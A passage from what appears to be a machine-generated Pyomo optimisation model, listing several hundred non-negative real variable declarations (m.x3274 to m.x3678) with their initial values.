m.x3274 = Var(within=Reals,bounds=(0,None),initialize=11.0124286094421)
m.x3275 = Var(within=Reals,bounds=(0,None),initialize=0.0754548203645344)
m.x3276 = Var(within=Reals,bounds=(0,None),initialize=0.030611)
m.x3277 = Var(within=Reals,bounds=(0,None),initialize=0.00298)
m.x3278 = Var(within=Reals,bounds=(0,None),initialize=0.008740732)
m.x3279 = Var(within=Reals,bounds=(0,None),initialize=0.1472727647)
m.x3280 = Var(within=Reals,bounds=(0,None),initialize=0.00393139464625758)
m.x3281 = Var(within=Reals,bounds=(0,None),initialize=0.086962)
m.x3282 = Var(within=Reals,bounds=(0,None),initialize=0.001129)
m.x3283 = Var(within=Reals,bounds=(0,None),initialize=0.057378)
m.x3284 = Var(within=Reals,bounds=(0,None),initialize=0.001618)
m.x3285 = Var(within=Reals,bounds=(0,None),initialize=0.07928459658)
m.x3286 = Var(within=Reals,bounds=(0,None),initialize=0.021643)
m.x3287 = Var(within=Reals,bounds=(0,None),initialize=0.003401)
m.x3288 = Var(within=Reals,bounds=(0,None),initialize=0.220185)
m.x3289 = Var(within=Reals,bounds=(0,None),initialize=0.0150409)
m.x3290 = Var(within=Reals,bounds=(0,None),initialize=5.55302)
m.x3291 = Var(within=Reals,bounds=(0,None),initialize=0.280683)
m.x3292 = Var(within=Reals,bounds=(0,None),initialize=0.0106)
m.x3293 = Var(within=Reals,bounds=(0,None),initialize=131.63247)
m.x3294 = Var(within=Reals,bounds=(0,None),initialize=0.161086794709578)
m.x3295 = Var(within=Reals,bounds=(0,None),initialize=0.300483205290422)
m.x3296 = Var(within=Reals,bounds=(0,None),initialize=0.01731)
m.x3297 = Var(within=Reals,bounds=(0,None),initialize=0.001695)
m.x3298 = Var(within=Reals,bounds=(0,None),initialize=0.001493)
m.x3299 = Var(within=Reals,bounds=(0,None),initialize=0.012768)
m.x3300 = Var(within=Reals,bounds=(0,None),initialize=0.008223)
m.x3301 = Var(within=Reals,bounds=(0,None),initialize=0.0034589905)
m.x3302 = Var(within=Reals,bounds=(0,None),initialize=0.0019964256)
m.x3303 = Var(within=Reals,bounds=(0,None),initialize=0.084689)
m.x3304 = Var(within=Reals,bounds=(0,None),initialize=0.172748)
m.x3305 = Var(within=Reals,bounds=(0,None),initialize=0.06891898911345)
m.x3306 = Var(within=Reals,bounds=(0,None),initialize=26.63323)
m.x3307 = Var(within=Reals,bounds=(0,None),initialize=0.0314865629844971)
m.x3308 = Var(within=Reals,bounds=(0,None),initialize=0.562567722615503)
m.x3309 = Var(within=Reals,bounds=(0,None),initialize=0.011236452)
m.x3310 = Var(within=Reals,bounds=(0,None),initialize=0.00148382736)
m.x3311 = Var(within=Reals,bounds=(0,None),initialize=0.0026321004)
m.x3312 = Var(within=Reals,bounds=(0,None),initialize=0.02372430612)
m.x3313 = Var(within=Reals,bounds=(0,None),initialize=0.0677917)
m.x3314 = Var(within=Reals,bounds=(0,None),initialize=0.1027134852)
m.x3315 = Var(within=Reals,bounds=(0,None),initialize=10.7249932546949)
m.x3316 = Var(within=Reals,bounds=(0,None),initialize=0.354066237714111)
m.x3317 = Var(within=Reals,bounds=(0,None),initialize=0.977945261428418)
m.x3318 = Var(within=Reals,bounds=(0,None),initialize=0.237895163697734)
m.x3319 = Var(within=Reals,bounds=(0,None),initialize=1.28431304598073)
m.x3320 = Var(within=Reals,bounds=(0,None),initialize=1.1230197215671)
m.x3321 = Var(within=Reals,bounds=(0,None),initialize=0.399133414040633)
m.x3322 = Var(within=Reals,bounds=(0,None),initialize=0.276762407270882)
m.x3323 = Var(within=Reals,bounds=(0,None),initialize=0.357141819517182)
m.x3324 = Var(within=Reals,bounds=(0,None),initialize=0.0205793699376)
m.x3325 = Var(within=Reals,bounds=(0,None),initialize=0.023514000184336)
m.x3326 = Var(within=Reals,bounds=(0,None),initialize=0.641428446778352)
m.x3327 = Var(within=Reals,bounds=(0,None),initialize=0.391563438577859)
m.x3328 = Var(within=Reals,bounds=(0,None),initialize=1.32352135926)
m.x3329 = Var(within=Reals,bounds=(0,None),initialize=0.10898811796)
m.x3330 = Var(within=Reals,bounds=(0,None),initialize=2.00171465752354)
m.x3331 = Var(within=Reals,bounds=(0,None),initialize=1.42705775633403)
m.x3332 = Var(within=Reals,bounds=(0,None),initialize=0.141836153011099)
m.x3333 = Var(within=Reals,bounds=(0,None),initialize=1.74531606494077)
m.x3334 = Var(within=Reals,bounds=(0,None),initialize=1.07369440932)
m.x3335 = Var(within=Reals,bounds=(0,None),initialize=1.13322)
m.x3336 = Var(within=Reals,bounds=(0,None),initialize=2.2952938302)
m.x3337 = Var(within=Reals,bounds=(0,None),initialize=3.622989007008)
m.x3338 = Var(within=Reals,bounds=(0,None),initialize=3.25505268363868)
m.x3339 = Var(within=Reals,bounds=(0,None),initialize=0.143848618445512)
m.x3340 = Var(within=Reals,bounds=(0,None),initialize=0.17836272436)
m.x3341 = Var(within=Reals,bounds=(0,None),initialize=0.60586833934)
m.x3342 = Var(within=Reals,bounds=(0,None),initialize=0.478299127728)
m.x3343 = Var(within=Reals,bounds=(0,None),initialize=0.896707113288)
m.x3344 = Var(within=Reals,bounds=(0,None),initialize=0.055228392972)
m.x3345 = Var(within=Reals,bounds=(0,None),initialize=0.855032245)
m.x3346 = Var(within=Reals,bounds=(0,None),initialize=0.09590465706)
m.x3347 = Var(within=Reals,bounds=(0,None),initialize=0.0187605331287052)
m.x3348 = Var(within=Reals,bounds=(0,None),initialize=0.233624624229944)
m.x3349 = Var(within=Reals,bounds=(0,None),initialize=0.599863450087462)
m.x3350 = Var(within=Reals,bounds=(0,None),initialize=0.551121839365814)
m.x3351 = Var(within=Reals,bounds=(0,None),initialize=0.0491035599346815)
m.x3352 = Var(within=Reals,bounds=(0,None),initialize=0.606128033615327)
m.x3353 = Var(within=Reals,bounds=(0,None),initialize=0.0208097555946574)
m.x3354 = Var(within=Reals,bounds=(0,None),initialize=0.381563673676899)
m.x3355 = Var(within=Reals,bounds=(0,None),initialize=0.575862486822612)
m.x3356 = Var(within=Reals,bounds=(0,None),initialize=0.995759299388352)
m.x3357 = Var(within=Reals,bounds=(0,None),initialize=2.00421635138841)
m.x3358 = Var(within=Reals,bounds=(0,None),initialize=4.53389097975563)
m.x3359 = Var(within=Reals,bounds=(0,None),initialize=8.21651955558519)
m.x3360 = Var(within=Reals,bounds=(0,None),initialize=15.3266823444148)
m.x3361 = Var(within=Reals,bounds=(0,None),initialize=1.1634984)
m.x3362 = Var(within=Reals,bounds=(0,None),initialize=2.3508252)
m.x3363 = Var(within=Reals,bounds=(0,None),initialize=4.1273026)
m.x3364 = Var(within=Reals,bounds=(0,None),initialize=12.894104)
m.x3365 = Var(within=Reals,bounds=(0,None),initialize=2.9326006666)
m.x3366 = Var(within=Reals,bounds=(0,None),initialize=1.7676265)
m.x3367 = Var(within=Reals,bounds=(0,None),initialize=28.0409807)
m.x3368 = Var(within=Reals,bounds=(0,None),initialize=32.4025769)
m.x3369 = Var(within=Reals,bounds=(0,None),initialize=14.9767481725)
m.x3370 = Var(within=Reals,bounds=(0,None),initialize=1.8235717)
m.x3371 = Var(within=Reals,bounds=(0,None),initialize=3.029659991371)
m.x3372 = Var(within=Reals,bounds=(0,None),initialize=0.655040914724)
m.x3373 = Var(within=Reals,bounds=(0,None),initialize=1.341728223446)
m.x3374 = Var(within=Reals,bounds=(0,None),initialize=0.282366)
m.x3375 = Var(within=Reals,bounds=(0,None),initialize=0.2353596875)
m.x3376 = Var(within=Reals,bounds=(0,None),initialize=3.430553717045)
m.x3377 = Var(within=Reals,bounds=(0,None),initialize=1.983273874692)
m.x3378 = Var(within=Reals,bounds=(0,None),initialize=0.0587329224)
m.x3379 = Var(within=Reals,bounds=(0,None),initialize=2.31148537683)
m.x3380 = Var(within=Reals,bounds=(0,None),initialize=0.61094580515)
m.x3381 = Var(within=Reals,bounds=(0,None),initialize=1.71163881484265)
m.x3382 = Var(within=Reals,bounds=(0,None),initialize=0.2543243778)
m.x3383 = Var(within=Reals,bounds=(0,None),initialize=0.43768)
m.x3384 = Var(within=Reals,bounds=(0,None),initialize=0.436258071190445)
m.x3385 = Var(within=Reals,bounds=(0,None),initialize=0.709919567926242)
m.x3386 = Var(within=Reals,bounds=(0,None),initialize=0.186974051527342)
m.x3387 = Var(within=Reals,bounds=(0,None),initialize=1.37178405850488)
m.x3388 = Var(within=Reals,bounds=(0,None),initialize=4.449)
m.x3389 = Var(within=Reals,bounds=(0,None),initialize=6.551)
m.x3390 = Var(within=Reals,bounds=(0,None),initialize=1.17143)
m.x3391 = Var(within=Reals,bounds=(0,None),initialize=3.140964)
m.x3392 = Var(within=Reals,bounds=(0,None),initialize=24.834424)
m.x3393 = Var(within=Reals,bounds=(0,None),initialize=16.008173)
m.x3394 = Var(within=Reals,bounds=(0,None),initialize=6.123132)
m.x3395 = Var(within=Reals,bounds=(0,None),initialize=4.114154)
m.x3396 = Var(within=Reals,bounds=(0,None),initialize=16.7945992)
m.x3397 = Var(within=Reals,bounds=(0,None),initialize=1.1)
m.x3398 = Var(within=Reals,bounds=(0,None),initialize=1.77719528887159)
m.x3399 = Var(within=Reals,bounds=(0,None),initialize=3.31509071112841)
m.x3400 = Var(within=Reals,bounds=(0,None),initialize=0.2350441)
m.x3401 = Var(within=Reals,bounds=(0,None),initialize=0.4856054)
m.x3402 = Var(within=Reals,bounds=(0,None),initialize=0.8834335)
m.x3403 = Var(within=Reals,bounds=(0,None),initialize=5.5742547)
m.x3404 = Var(within=Reals,bounds=(0,None),initialize=3.6181597)
m.x3405 = Var(within=Reals,bounds=(0,None),initialize=0.2765549)
m.x3406 = Var(within=Reals,bounds=(0,None),initialize=0.7337913)
m.x3407 = Var(within=Reals,bounds=(0,None),initialize=4.7583075)
m.x3408 = Var(within=Reals,bounds=(0,None),initialize=4.9098262964)
m.x3409 = Var(within=Reals,bounds=(0,None),initialize=0.2084190828)
m.x3410 = Var(within=Reals,bounds=(0,None),initialize=1.722020213488)
m.x3411 = Var(within=Reals,bounds=(0,None),initialize=0.331134977386)
m.x3412 = Var(within=Reals,bounds=(0,None),initialize=1.50444212413)
m.x3413 = Var(within=Reals,bounds=(0,None),initialize=0.09968588)
m.x3414 = Var(within=Reals,bounds=(0,None),initialize=0.15735262125)
m.x3415 = Var(within=Reals,bounds=(0,None),initialize=0.79973663622)
m.x3416 = Var(within=Reals,bounds=(0,None),initialize=1.120913215312)
m.x3417 = Var(within=Reals,bounds=(0,None),initialize=0.0799071031)
m.x3418 = Var(within=Reals,bounds=(0,None),initialize=0.131325808736)
m.x3419 = Var(within=Reals,bounds=(0,None),initialize=0.649921205615)
m.x3420 = Var(within=Reals,bounds=(0,None),initialize=1.03540119942397)
m.x3421 = Var(within=Reals,bounds=(0,None),initialize=0.8752106812)
m.x3422 = Var(within=Reals,bounds=(0,None),initialize=0.4726244)
m.x3423 = Var(within=Reals,bounds=(0,None),initialize=1.13905292404507)
m.x3424 = Var(within=Reals,bounds=(0,None),initialize=0.418032939964254)
m.x3425 = Var(within=Reals,bounds=(0,None),initialize=0.200518856890342)
m.x3426 = Var(within=Reals,bounds=(0,None),initialize=1.20787067442792)
m.x3427 = Var(within=Reals,bounds=(0,None),initialize=3.2961121)
m.x3428 = Var(within=Reals,bounds=(0,None),initialize=4.3163451)
m.x3429 = Var(within=Reals,bounds=(0,None),initialize=1.154730339)
m.x3430 = Var(within=Reals,bounds=(0,None),initialize=0.8358781)
m.x3431 = Var(within=Reals,bounds=(0,None),initialize=3.22470912242201)
m.x3432 = Var(within=Reals,bounds=(0,None),initialize=9.67579079021325)
m.x3433 = Var(within=Reals,bounds=(0,None),initialize=0.003039)
m.x3434 = Var(within=Reals,bounds=(0,None),initialize=0.070398)
m.x3435 = Var(within=Reals,bounds=(0,None),initialize=0.180143)
m.x3436 = Var(within=Reals,bounds=(0,None),initialize=1.181778)
m.x3437 = Var(within=Reals,bounds=(0,None),initialize=10.061735312)
m.x3438 = Var(within=Reals,bounds=(0,None),initialize=2.0312236)
m.x3439 = Var(within=Reals,bounds=(0,None),initialize=0.173125696)
m.x3440 = Var(within=Reals,bounds=(0,None),initialize=0.147088)
m.x3441 = Var(within=Reals,bounds=(0,None),initialize=0.182582283660864)
m.x3442 = Var(within=Reals,bounds=(0,None),initialize=2.50040598522118)
m.x3443 = Var(within=Reals,bounds=(0,None),initialize=9.47223574437838)
m.x3444 = Var(within=Reals,bounds=(0,None),initialize=14.6233334839817)
m.x3445 = Var(within=Reals,bounds=(0,None),initialize=1.02943687585272)
m.x3446 = Var(within=Reals,bounds=(0,None),initialize=12.7072365042724)
m.x3447 = Var(within=Reals,bounds=(0,None),initialize=0.436268364556851)
m.x3448 = Var(within=Reals,bounds=(0,None),initialize=7.99933277121532)
m.x3449 = Var(within=Reals,bounds=(0,None),initialize=5.95244996138264)
m.x3450 = Var(within=Reals,bounds=(0,None),initialize=8.95573000178086)
m.x3451 = Var(within=Reals,bounds=(0,None),initialize=19.6471932757303)
m.x3452 = Var(within=Reals,bounds=(0,None),initialize=76.2019652705837)
m.x3453 = Var(within=Reals,bounds=(0,None),initialize=0.530955)
m.x3454 = Var(within=Reals,bounds=(0,None),initialize=0.30826)
m.x3455 = Var(within=Reals,bounds=(0,None),initialize=0.108523)
m.x3456 = Var(within=Reals,bounds=(0,None),initialize=0.0337874)
m.x3457 = Var(within=Reals,bounds=(0,None),initialize=0.00260588591562475)
m.x3458 = Var(within=Reals,bounds=(0,None),initialize=0.00267812)
m.x3459 = Var(within=Reals,bounds=(0,None),initialize=12.8848947512802)
m.x3460 = Var(within=Reals,bounds=(0,None),initialize=0.4843398044115)
m.x3461 = Var(within=Reals,bounds=(0,None),initialize=0.615658)
m.x3462 = Var(within=Reals,bounds=(0,None),initialize=0.018547)
m.x3463 = Var(within=Reals,bounds=(0,None),initialize=0.0173972)
m.x3464 = Var(within=Reals,bounds=(0,None),initialize=4.9706658)
m.x3465 = Var(within=Reals,bounds=(0,None),initialize=0.2990025)
m.x3466 = Var(within=Reals,bounds=(0,None),initialize=0.4495)
m.x3467 = Var(within=Reals,bounds=(0,None),initialize=0.318241)
m.x3468 = Var(within=Reals,bounds=(0,None),initialize=0.1926084291101)
m.x3469 = Var(within=Reals,bounds=(0,None),initialize=2.92131415863407)
m.x3470 = Var(within=Reals,bounds=(0,None),initialize=7.67695140142887)
m.x3471 = Var(within=Reals,bounds=(0,None),initialize=11.8627377626878)
m.x3472 = Var(within=Reals,bounds=(0,None),initialize=0.535845077135325)
m.x3473 = Var(within=Reals,bounds=(0,None),initialize=6.61440277158175)
m.x3474 = Var(within=Reals,bounds=(0,None),initialize=0.227087508657611)
m.x3475 = Var(within=Reals,bounds=(0,None),initialize=4.16383285499893)
m.x3476 = Var(within=Reals,bounds=(0,None),initialize=4.10388431300999)
m.x3477 = Var(within=Reals,bounds=(0,None),initialize=7.68163730911756)
m.x3478 = Var(within=Reals,bounds=(0,None),initialize=12.4291774948124)
m.x3479 = Var(within=Reals,bounds=(0,None),initialize=39.3098501150966)
m.x3480 = Var(within=Reals,bounds=(0,None),initialize=0.31446)
m.x3481 = Var(within=Reals,bounds=(0,None),initialize=0.00456)
m.x3482 = Var(within=Reals,bounds=(0,None),initialize=0.001)
m.x3483 = Var(within=Reals,bounds=(0,None),initialize=0.022055001518853)
m.x3484 = Var(within=Reals,bounds=(0,None),initialize=0.0102172814)
m.x3485 = Var(within=Reals,bounds=(0,None),initialize=0.002588996999688)
m.x3486 = Var(within=Reals,bounds=(0,None),initialize=0.001567887517)
m.x3487 = Var(within=Reals,bounds=(0,None),initialize=0.003279)
m.x3488 = Var(within=Reals,bounds=(0,None),initialize=0.006749)
m.x3489 = Var(within=Reals,bounds=(0,None),initialize=0.0298395196)
m.x3490 = Var(within=Reals,bounds=(0,None),initialize=0.0046291845)
m.x3491 = Var(within=Reals,bounds=(0,None),initialize=0.0299948623155)
m.x3492 = Var(within=Reals,bounds=(0,None),initialize=0.0497033595763023)
m.x3493 = Var(within=Reals,bounds=(0,None),initialize=0.451854745815614)
m.x3494 = Var(within=Reals,bounds=(0,None),initialize=1.54441175309256)
m.x3495 = Var(within=Reals,bounds=(0,None),initialize=3.0340576305907)
m.x3496 = Var(within=Reals,bounds=(0,None),initialize=0.109557531268913)
m.x3497 = Var(within=Reals,bounds=(0,None),initialize=1.35236408692385)
m.x3498 = Var(within=Reals,bounds=(0,None),initialize=0.046429738542233)
m.x3499 = Var(within=Reals,bounds=(0,None),initialize=0.851326750352637)
m.x3500 = Var(within=Reals,bounds=(0,None),initialize=0.5657680078358)
m.x3501 = Var(within=Reals,bounds=(0,None),initialize=0.75985437249865)
m.x3502 = Var(within=Reals,bounds=(0,None),initialize=1.72819031068099)
m.x3503 = Var(within=Reals,bounds=(0,None),initialize=2.82939885233739)
m.x3504 = Var(within=Reals,bounds=(0,None),initialize=6.456)
m.x3505 = Var(within=Reals,bounds=(0,None),initialize=0.004184)
m.x3506 = Var(within=Reals,bounds=(0,None),initialize=0.0312685866)
m.x3507 = Var(within=Reals,bounds=(0,None),initialize=0.0075675565)
m.x3508 = Var(within=Reals,bounds=(0,None),initialize=0.0165008901462231)
m.x3509 = Var(within=Reals,bounds=(0,None),initialize=0.237220417002714)
m.x3510 = Var(within=Reals,bounds=(0,None),initialize=0.927009726921396)
m.x3511 = Var(within=Reals,bounds=(0,None),initialize=1.80731957509853)
m.x3512 = Var(within=Reals,bounds=(0,None),initialize=0.0948822047646439)
m.x3513 = Var(within=Reals,bounds=(0,None),initialize=1.17121374245742)
m.x3514 = Var(within=Reals,bounds=(0,None),initialize=0.0402104347232862)
m.x3515 = Var(within=Reals,bounds=(0,None),initialize=0.737290792454153)
m.x3516 = Var(within=Reals,bounds=(0,None),initialize=0.349105303471494)
m.x3517 = Var(within=Reals,bounds=(0,None),initialize=0.973719815057462)
m.x3518 = Var(within=Reals,bounds=(0,None),initialize=2.34331964170002)
m.x3519 = Var(within=Reals,bounds=(0,None),initialize=6.18221953303095)
m.x3520 = Var(within=Reals,bounds=(0,None),initialize=17.9695)
m.x3521 = Var(within=Reals,bounds=(0,None),initialize=0.0239202914171079)
m.x3522 = Var(within=Reals,bounds=(0,None),initialize=0.0446197085828921)
m.x3523 = Var(within=Reals,bounds=(0,None),initialize=0.012394)
m.x3524 = Var(within=Reals,bounds=(0,None),initialize=0.014524)
m.x3525 = Var(within=Reals,bounds=(0,None),initialize=0.069943)
m.x3526 = Var(within=Reals,bounds=(0,None),initialize=0.036823)
m.x3527 = Var(within=Reals,bounds=(0,None),initialize=0.018544)
m.x3528 = Var(within=Reals,bounds=(0,None),initialize=0.004785)
m.x3529 = Var(within=Reals,bounds=(0,None),initialize=0.022428)
m.x3530 = Var(within=Reals,bounds=(0,None),initialize=0.755298)
m.x3531 = Var(within=Reals,bounds=(0,None),initialize=0.009954)
m.x3532 = Var(within=Reals,bounds=(0,None),initialize=0.00748912042040259)
m.x3533 = Var(within=Reals,bounds=(0,None),initialize=0.218102647885731)
m.x3534 = Var(within=Reals,bounds=(0,None),initialize=0.055768)
m.x3535 = Var(within=Reals,bounds=(0,None),initialize=0.0519120104496)
m.x3536 = Var(within=Reals,bounds=(0,None),initialize=0.075615)
m.x3537 = Var(within=Reals,bounds=(0,None),initialize=0.023368312)
m.x3538 = Var(within=Reals,bounds=(0,None),initialize=0.019026688)
m.x3539 = Var(within=Reals,bounds=(0,None),initialize=0.0538976237392429)
m.x3540 = Var(within=Reals,bounds=(0,None),initialize=0.00211816)
m.x3541 = Var(within=Reals,bounds=(0,None),initialize=0.0040242)
m.x3542 = Var(within=Reals,bounds=(0,None),initialize=0.053471138)
m.x3543 = Var(within=Reals,bounds=(0,None),initialize=0.145386)
m.x3544 = Var(within=Reals,bounds=(0,None),initialize=0.034925)
m.x3545 = Var(within=Reals,bounds=(0,None),initialize=0.08915661396)
m.x3546 = Var(within=Reals,bounds=(0,None),initialize=0.006901)
m.x3547 = Var(within=Reals,bounds=(0,None),initialize=0.112332)
m.x3548 = Var(within=Reals,bounds=(0,None),initialize=0.018412)
m.x3549 = Var(within=Reals,bounds=(0,None),initialize=0.5132388)
m.x3550 = Var(within=Reals,bounds=(0,None),initialize=0.0978)
m.x3551 = Var(within=Reals,bounds=(0,None),initialize=4.44261325746357)
m.x3552 = Var(within=Reals,bounds=(0,None),initialize=3.5218822311666)
m.x3553 = Var(within=Reals,bounds=(0,None),initialize=0.001508)
m.x3554 = Var(within=Reals,bounds=(0,None),initialize=0.108147)
m.x3555 = Var(within=Reals,bounds=(0,None),initialize=0.701418)
m.x3556 = Var(within=Reals,bounds=(0,None),initialize=1.1842192)
m.x3557 = Var(within=Reals,bounds=(0,None),initialize=0.1809147)
m.x3558 = Var(within=Reals,bounds=(0,None),initialize=0.19159)
m.x3559 = Var(within=Reals,bounds=(0,None),initialize=0.00236424837064668)
m.x3560 = Var(within=Reals,bounds=(0,None),initialize=0.0255270002350324)
m.x3561 = Var(within=Reals,bounds=(0,None),initialize=0.055863743702221)
m.x3562 = Var(within=Reals,bounds=(0,None),initialize=0.0725361924450216)
m.x3563 = Var(within=Reals,bounds=(0,None),initialize=0.00424264398213649)
m.x3564 = Var(within=Reals,bounds=(0,None),initialize=0.052370652100236)
m.x3565 = Var(within=Reals,bounds=(0,None),initialize=0.00179800373864639)
m.x3566 = Var(within=Reals,bounds=(0,None),initialize=0.0329678505200152)
m.x3567 = Var(within=Reals,bounds=(0,None),initialize=0.0243002279601108)
m.x3568 = Var(within=Reals,bounds=(0,None),initialize=0.0389316916125456)
m.x3569 = Var(within=Reals,bounds=(0,None),initialize=0.0687485166474724)
m.x3570 = Var(within=Reals,bounds=(0,None),initialize=0.168504461069753)
m.x3571 = Var(within=Reals,bounds=(0,None),initialize=32.71194)
m.x3572 = Var(within=Reals,bounds=(0,None),initialize=0.0364794547416)
m.x3573 = Var(within=Reals,bounds=(0,None),initialize=0.114695080872)
m.x3574 = Var(within=Reals,bounds=(0,None),initialize=0.0250011873012)
m.x3575 = Var(within=Reals,bounds=(0,None),initialize=0.055674559526)
m.x3576 = Var(within=Reals,bounds=(0,None),initialize=0.0434456960759)
m.x3577 = Var(within=Reals,bounds=(0,None),initialize=0.0109854143096)
m.x3578 = Var(within=Reals,bounds=(0,None),initialize=0.1255851835848)
m.x3579 = Var(within=Reals,bounds=(0,None),initialize=0.003492020854)
m.x3580 = Var(within=Reals,bounds=(0,None),initialize=0.372079714324854)
m.x3581 = Var(within=Reals,bounds=(0,None),initialize=0.00909648034732984)
m.x3582 = Var(within=Reals,bounds=(0,None),initialize=1.21668926019416)
m.x3583 = Var(within=Reals,bounds=(0,None),initialize=0.3519171043248)
m.x3584 = Var(within=Reals,bounds=(0,None),initialize=0.768547504199721)
m.x3585 = Var(within=Reals,bounds=(0,None),initialize=0.3624705242892)
m.x3586 = Var(within=Reals,bounds=(0,None),initialize=0.122508840855478)
m.x3587 = Var(within=Reals,bounds=(0,None),initialize=0.0963431211603174)
m.x3588 = Var(within=Reals,bounds=(0,None),initialize=0.120429209453612)
m.x3589 = Var(within=Reals,bounds=(0,None),initialize=0.004994809434)
m.x3590 = Var(within=Reals,bounds=(0,None),initialize=0.021482422992992)
m.x3591 = Var(within=Reals,bounds=(0,None),initialize=0.16203540438494)
m.x3592 = Var(within=Reals,bounds=(0,None),initialize=0.356284109966525)
m.x3593 = Var(within=Reals,bounds=(0,None),initialize=1.097192)
m.x3594 = Var(within=Reals,bounds=(0,None),initialize=2.79242622409)
m.x3595 = Var(within=Reals,bounds=(0,None),initialize=0.0346158713223266)
m.x3596 = Var(within=Reals,bounds=(0,None),initialize=0.636108536860527)
m.x3597 = Var(within=Reals,bounds=(0,None),initialize=0.363589906528056)
m.x3598 = Var(within=Reals,bounds=(0,None),initialize=0.143636635873144)
m.x3599 = Var(within=Reals,bounds=(0,None),initialize=0.017268)
m.x3600 = Var(within=Reals,bounds=(0,None),initialize=0.6010422)
m.x3601 = Var(within=Reals,bounds=(0,None),initialize=0.127222)
m.x3602 = Var(within=Reals,bounds=(0,None),initialize=6.76394375514328)
m.x3603 = Var(within=Reals,bounds=(0,None),initialize=0.43183256254565)
m.x3604 = Var(within=Reals,bounds=(0,None),initialize=2.2967545773032)
m.x3605 = Var(within=Reals,bounds=(0,None),initialize=0.1903051826796)
m.x3606 = Var(within=Reals,bounds=(0,None),initialize=0.1195485574624)
m.x3607 = Var(within=Reals,bounds=(0,None),initialize=0.9592616)
m.x3608 = Var(within=Reals,bounds=(0,None),initialize=0.42921901161436)
m.x3609 = Var(within=Reals,bounds=(0,None),initialize=0.01916)
m.x3610 = Var(within=Reals,bounds=(0,None),initialize=0.0449890161068)
m.x3611 = Var(within=Reals,bounds=(0,None),initialize=0.374946781244389)
m.x3612 = Var(within=Reals,bounds=(0,None),initialize=4.04833379258381)
m.x3613 = Var(within=Reals,bounds=(0,None),initialize=8.85944605036568)
m.x3614 = Var(within=Reals,bounds=(0,None),initialize=11.5035341543009)
m.x3615 = Var(within=Reals,bounds=(0,None),initialize=0.672842043508669)
m.x3616 = Var(within=Reals,bounds=(0,None),initialize=8.30547571923766)
m.x3617 = Var(within=Reals,bounds=(0,None),initialize=0.285145893655177)
m.x3618 = Var(within=Reals,bounds=(0,None),initialize=5.22838022878483)
m.x3619 = Var(within=Reals,bounds=(0,None),initialize=3.85377964949439)
m.x3620 = Var(within=Reals,bounds=(0,None),initialize=6.17418738223788)
m.x3621 = Var(within=Reals,bounds=(0,None),initialize=10.9028456368336)
m.x3622 = Var(within=Reals,bounds=(0,None),initialize=26.7231675351196)
m.x3623 = Var(within=Reals,bounds=(0,None),initialize=0.114123242694318)
m.x3624 = Var(within=Reals,bounds=(0,None),initialize=0.212879757305682)
m.x3625 = Var(within=Reals,bounds=(0,None),initialize=0.006718)
m.x3626 = Var(within=Reals,bounds=(0,None),initialize=0.029069)
m.x3627 = Var(within=Reals,bounds=(0,None),initialize=0.004653)
m.x3628 = Var(within=Reals,bounds=(0,None),initialize=0.010897)
m.x3629 = Var(within=Reals,bounds=(0,None),initialize=0.030875)
m.x3630 = Var(within=Reals,bounds=(0,None),initialize=0.005151)
m.x3631 = Var(within=Reals,bounds=(0,None),initialize=0.059278)
m.x3632 = Var(within=Reals,bounds=(0,None),initialize=0.001129)
m.x3633 = Var(within=Reals,bounds=(0,None),initialize=3.21853802155452)
m.x3634 = Var(within=Reals,bounds=(0,None),initialize=3.3177102062895)
m.x3635 = Var(within=Reals,bounds=(0,None),initialize=0.189208)
m.x3636 = Var(within=Reals,bounds=(0,None),initialize=0.00376)
m.x3637 = Var(within=Reals,bounds=(0,None),initialize=1.8557152)
m.x3638 = Var(within=Reals,bounds=(0,None),initialize=0.072623)
m.x3639 = Var(within=Reals,bounds=(0,None),initialize=0.176143011243206)
m.x3640 = Var(within=Reals,bounds=(0,None),initialize=1.90183178097095)
m.x3641 = Var(within=Reals,bounds=(0,None),initialize=4.16200267162979)
m.x3642 = Var(within=Reals,bounds=(0,None),initialize=5.40414599414021)
m.x3643 = Var(within=Reals,bounds=(0,None),initialize=0.316088654612027)
m.x3644 = Var(within=Reals,bounds=(0,None),initialize=3.90175773249352)
m.x3645 = Var(within=Reals,bounds=(0,None),initialize=0.13395622756212)
m.x3646 = Var(within=Reals,bounds=(0,None),initialize=2.45619560825709)
m.x3647 = Var(within=Reals,bounds=(0,None),initialize=1.81043386977972)
m.x3648 = Var(within=Reals,bounds=(0,None),initialize=2.90051818521502)
m.x3649 = Var(within=Reals,bounds=(0,None),initialize=5.12195372158686)
m.x3650 = Var(within=Reals,bounds=(0,None),initialize=12.5540461608192)
m.x3651 = Var(within=Reals,bounds=(0,None),initialize=0.00988469573267103)
m.x3652 = Var(within=Reals,bounds=(0,None),initialize=0.4188943026)
m.x3653 = Var(within=Reals,bounds=(0,None),initialize=0.089906)
m.x3654 = Var(within=Reals,bounds=(0,None),initialize=0.1787707)
m.x3655 = Var(within=Reals,bounds=(0,None),initialize=0.3390187)
m.x3656 = Var(within=Reals,bounds=(0,None),initialize=0.017159)
m.x3657 = Var(within=Reals,bounds=(0,None),initialize=0.100280815265476)
m.x3658 = Var(within=Reals,bounds=(0,None),initialize=0.852234305688922)
m.x3659 = Var(within=Reals,bounds=(0,None),initialize=1.92094528312345)
m.x3660 = Var(within=Reals,bounds=(0,None),initialize=1.7127032033681)
m.x3661 = Var(within=Reals,bounds=(0,None),initialize=0.233755968663716)
m.x3662 = Var(within=Reals,bounds=(0,None),initialize=2.88545363758672)
m.x3663 = Var(within=Reals,bounds=(0,None),initialize=0.0990641937805541)
m.x3664 = Var(within=Reals,bounds=(0,None),initialize=1.81642199192636)
m.x3665 = Var(within=Reals,bounds=(0,None),initialize=2.07473215243825)
m.x3666 = Var(within=Reals,bounds=(0,None),initialize=1.91162592490643)
m.x3667 = Var(within=Reals,bounds=(0,None),initialize=1.84992924143647)
m.x3668 = Var(within=Reals,bounds=(0,None),initialize=4.11017705440097)
m.x3669 = Var(within=Reals,bounds=(0,None),initialize=0.0541218520100628)
m.x3670 = Var(within=Reals,bounds=(0,None),initialize=0.0146068950761892)
m.x3671 = Var(within=Reals,bounds=(0,None),initialize=0.21417091934138)
m.x3672 = Var(within=Reals,bounds=(0,None),initialize=0.124584952)
m.x3673 = Var(within=Reals,bounds=(0,None),initialize=0.0510555356238)
m.x3674 = Var(within=Reals,bounds=(0,None),initialize=0.014994)
m.x3675 = Var(within=Reals,bounds=(0,None),initialize=0.004634102)
m.x3676 = Var(within=Reals,bounds=(0,None),initialize=0.003386198)
m.x3677 = Var(within=Reals,bounds=(0,None),initialize=0.135363925307153)
m.x3678 = Var(within=Reals,bounds=(0,None),initialize=0.00360256)
